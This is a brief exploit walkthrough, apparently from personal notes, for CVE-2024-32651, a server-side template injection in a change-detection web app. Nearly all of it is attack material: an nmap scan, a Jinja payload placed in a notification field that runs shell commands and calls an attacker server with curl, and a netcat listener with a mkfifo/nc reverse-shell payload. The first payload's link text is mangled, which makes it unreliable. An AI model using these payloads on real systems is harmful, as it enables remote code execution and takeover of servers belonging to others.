CVE-2024-32651

Exploiting the change detection web app vulnerabilty.

Testing only

Check if service is runninng nmap -Pn --open 192.168.214.97 -p 5000

Start local webserver python3 -m http.server 8001

On the Notification Body field add the payload to connect to attacker

{{ self.**init**.**globals**.**builtins**.**import**('os').popen('curl [http://192.168.214.97:5000').read()](http://192.168.178.82:8001').read()) }}

Get a shell

Listen for incoming connections

rlwrap ncat -klvnp 1337

Enter payload

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.178.82 1337 >/tmp/f').read() }}

Last updated